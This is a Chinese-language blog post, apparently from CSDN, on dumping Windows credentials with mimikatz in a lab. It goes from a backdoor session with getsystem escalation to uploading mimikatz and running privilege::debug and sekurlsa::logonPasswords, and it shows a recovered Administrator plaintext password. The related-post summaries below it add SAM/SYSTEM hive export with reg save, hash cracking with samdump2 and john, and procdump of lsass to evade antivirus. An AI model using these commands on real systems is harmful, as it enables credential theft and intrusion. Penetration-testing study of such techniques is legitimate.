mimikatz抓取密码实战

已于 2022-11-22 09:19:57 修改
阅读量1k 收藏 4
点赞数
文章标签: 安全
于 2022-11-20 21:39:20 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51692662/article/details/127954242
版权

必须下载最新版本

Releases · gentilkiwi/mimikatz · GitHubhttps://github.com/gentilkiwi/mimikatz/releases

有32和64之分,systeminfo查看自己版本

a540850f59624b4d91ff1f2ccee35285.png

 首先我们用后门得到权限,在用getsystem提权,因为mimikatz要system权限,getuid查看是否提权成功f14ffbd10a1f44729c085f740364005d.png

 我是64靶机,所以x64文件夹拖入kali,并改名mimi

 d29b3c2bd76e4697a08c6717fb0b3938.png

 upoad mimi c:\\ 传入靶机c盘

4dc0d755cca94c6498a257c5e34cdac3.png

 shell 进入靶机操作界面, chcp 65001解决乱码

 ad9aa149347d422f8869fbcfe6c40ed7.png

进入C盘,dir查看

43c3152f18234b95a5fbdee2952de8de.png

 mimikatz.exe 运行 

然后输入 privilege::debug ,显示20 ok即可完成提权!

 d064e259ecb44ad6876695f3f8451c79.png

 sekurlsa::logonPassword   抓取靶机hash值

此时你发现sha1这种hash值都不需要解密。账号:Administrator  密码:hongrisec@2022

29eebdb2786743a5829e223029177fee.png

安全~小菜鸡
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
哈希处理介绍-使用Mimikatz以及John对Windows用户密码破解
ran的博客
02-06 6628
Windows系统使用两种算法对用户的密码进行哈希处理, 它们分别是LM-hash算法和NTLMhash算法。所谓哈希(hash) , 就是使用一种加密函数对其进行加密。这个加密函数对一个任意长度的字符串数据进行一次数学加密函数运算,然后返回一个固定长度的字符串。Windows的系统密码hash默认情况下一般由两部分组成:第一部分是LM-hash, 第二部分是NTLM-hash。通常可从Windows系统中的SAM文件和域控制器的NTDS.dit文件中获得所有用户的hash。
windows账户安全(通过mimikatz、Jhon获取用户密码)
qq_62729556的博客
07-23 2159
使用命令“john-format=NT hash.txt”使用Jhon自带的字典碰撞hash值进行破解。第一步:使用管理员权限,切换到c盘路径,执行命令“reg save hklm\sam sam.hive”和“reg save hklm\system system.hive”将注册表中SAM、System文件导出到本地磁盘。命令“ samdump2 system.hive sam.hive > hash.txt ” 使用sam dump 2工具将sam数据库文件破解成可识别的NTLM hash。
cs与msf权限传递,以及mimikatz抓取明文密码
最新发布
M372109150的博客
06-15 1134
cs与msf权限传递,以及mimikatz抓取win10明文密码
mimikatz获取windows平台的用户密码以及解决报错问题记录
weixin_44723534的博客
03-26 7054
一、思路 1.准备虚拟机环境windows7、windows10 2.检查电脑是32位还是64位 3.根据电脑32位/32位下载mimikatz工具 4.提前把电脑杀毒功能关闭 5.支持获取用户密码平台 支持:windows 7、windows server 2008、windows server 2012 不支持:windows10 6.mimikatz工具功能 mimikatz工具直接从lsass.exe进程里获取windows处于active状态账号的明文密码。 支持提升进程权限、注入进程,读取进程内
Kali-linux破解纯文本密码工具mimikatz
2301_77162959的博客
05-22 1109
当成功的获取到一个远程会话时,使用mimikatz工具可以很快的恢复密码。从该界面可以看到,当前系统中bob用户的哈希密码值中。从输出的信息中可以看到,输出的信息类似msv命令输出的信息。唯一不同的就是,这里可以看到使用哈希加密的原始密码。从以上信息中,可以看到bob用户的密码为www.123。从输出的信息中,可以看到获取到了一个与192.168.6.110主机的远程会话。从输出的信息中,可以看到mimikatz模块已加载成功。以上输出的信息就是当前用户摘要式身份验证的信息。搜集整理学习路线&笔记。
使用mimikatz获取windows密码凭证
cuteyann的博客
05-17 1405
(如果出现以下报错:ERROR kuhl_m_privilege_simple;RtlAdjustPrivilege (20) c0000061 说明你不是管理员权限)下载地址:https://github.com/gentilkiwi/mimikatz/releases。1、开启mimikatz。工具:mimikatz
mimikatz 抓取 Windows 明文密码
06-02
Mimikatz - Windows 密码抓取神器 轻量级调试器神器 - mimikatz - 直接抓取 Windows 明文密码! 这个神器的功能肯定不仅仅如此 在我看来它更像一个轻量级调试器 可以提升进程权限 注入进程 读取
mimikatz抓取管理员密码常用工具
12-10
1. **合法使用**:mimikatz的使用必须遵循法律法规,未经授权的密码抓取是违法的。在企业环境中,应只在获得授权并确保合规的情况下使用。 2. **风险防范**:mimikatz的存在提醒我们,要定期更改密码,使用复杂度高...
Mimikatz Windows 密码抓取神器
05-27
这款工具因其强大的密码抓取能力而闻名,可以提取出系统内存中的明文密码、哈希值以及其他敏感凭证,从而帮助安全研究人员检测系统的漏洞和防护措施。 在Windows环境中,Mimikatz 能够执行以下关键功能: 1. **LSA...
mimikatz获取系统密码
03-28
**mimikatz获取系统密码** 在网络安全领域,mimikatz是一款著名的工具,由法国安全研究员Benjamin Delpy开发。它主要用于提取操作系统中的敏感信息,如明文密码、NTLM哈希、kerberos票证等。mimikatz在渗透测试和...
密码抓取神器mimikatz
02-02
抓取整个windows系列的密码神器,必须在DOS命令提示符下以管理员身份运行;首先输入命令:privilege::debug 接着输入命令:sekurlsa::logonpasswords ,即可查看到相关信息
利用procdump+Mimikatz绕过杀软获取Windows明文密码
大河之犬的博客
09-12 584
Mimikatz是从lsass.exe中提取明文密码的,当无法在目标机器上运行Mimikatz时,我们可使用ProcDump工具将系统的lsass.exe进程进行转储,导出dmp文件,拖回到本地后,在本地再利用Mimikatz进行读取。而ProcDump本身是作为一个正常的运维辅助工具使用,并不带毒,所以不会被杀软查杀。
Mimikatz2.2 如何抓取Win11登录明文密码
玩人工智能的辣条哥的博客
03-25 2394
1.攻击者IP:192.168.1.35系统: KALI2022(vmware 16.0)2.靶机IP:192.168.1.16系统: Windows113.USB无线网卡4.Mimikatz 2.2 (win版)
windows凭据收集
fzy2003的博客
07-10 430
掌握windows凭据的收集方法。
mimikatz免杀之通过SAM和System文件抓取密码
m0_47083622的博客
04-19 8546
最近学习使用Mimikatz工具抓取Windows密码时发现Procdump、SQLDumper、DumpMinitool等一系列能导出lsass进程的工具已经被360“拉黑”了。不过还可以通过SAM和System文件抓取密码和Hash,目前测试360和火绒都不会拦截 以下为操作: 利用注册表命令将目标机的sam或者system文件导出 reg save hklm\sam sam.hive reg save hklm\system system.hive 然后将目标机上的sam.hive和syst
使用mimikatz抓取windows管理员密码
whoim_i的博客
12-20 9336
目录基于SAM文件的密码破解Mimikatz是个啥?mimikatz基础命令抓取windows密码使用mimikatz读取域控上所有域用户的hash值 基于SAM文件的密码破解 SAM文件即账号密码数据库文件。 当我们登录系统的时候,系统会自动地和 C:\Windows\System32\config\SAM 中的SAM文件自动校对,如发现此次密码与SAM文件中的加密数据符合时,你就会顺利登录;如...
mimikatz获取密码_mimikatz实战域渗透抓取域控管理员密码
weixin_39562327的博客
12-24 905
实验环境:攻击机:Kali ;靶 机:Windows server 2012 ;工具:mimikatz2.1;条件:靶机获取到shell之后必须是管理员的权限;步骤:**我这里攻击利用的msf里面的regsvr32_applocker_bypass_server模块 利用的是注册表漏洞** ps:其实这个也不远是漏洞,是微软自己不承认它是漏洞,但是黑客可以利用这个BUG下面我们就要利用msf生成攻...
内网渗透作业2(mimikatz、pwdump/procdump/LaZagne/nmap)
qq_45290991的博客
09-16 1095
内网渗透作业2(mimikatz、pwdump/procdump/LaZagne/nmap) 很紧张很“充实”的培训,今天主要是教了怎么抓取PC的密码…… 密码抓取5法 1.1mimikatz抓取明文密码 mimikatz是一个法国人写的轻量级调试器。出众之处在于其可以直接从 lsass.exe 里猎取windows处于active状态账号明文密码,非常强大。 在网上找了一些相关的文章自己的一点总结吧 下载地址:https://github.com/gentilkiwi/mimikatz/rele
使用L0phtCrack获取密码和使用mimikatz直接抓取Windows明文密码区别总结
03-22
L0phtCrack和mimikatz都是用于获取Windows系统密码的工具,但它们的工作原理不同。L0phtCrack是一款密码破解软件,它通过暴力破解、字典攻击等方式获取密码。而mimikatz则是一款密码抓取工具,它可以直接从Windows系统内存中获取明文密码。因此,L0phtCrack获取密码可能需要一定的时间才能破解成功,而mimikatz则可以直接获取明文密码,速度更快。另外,使用L0phtCrack需要对密码进行破解,可能会被系统检测到并触发安全警报,而使用mimikatz则可以在不留下痕迹的情况下获取密码
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值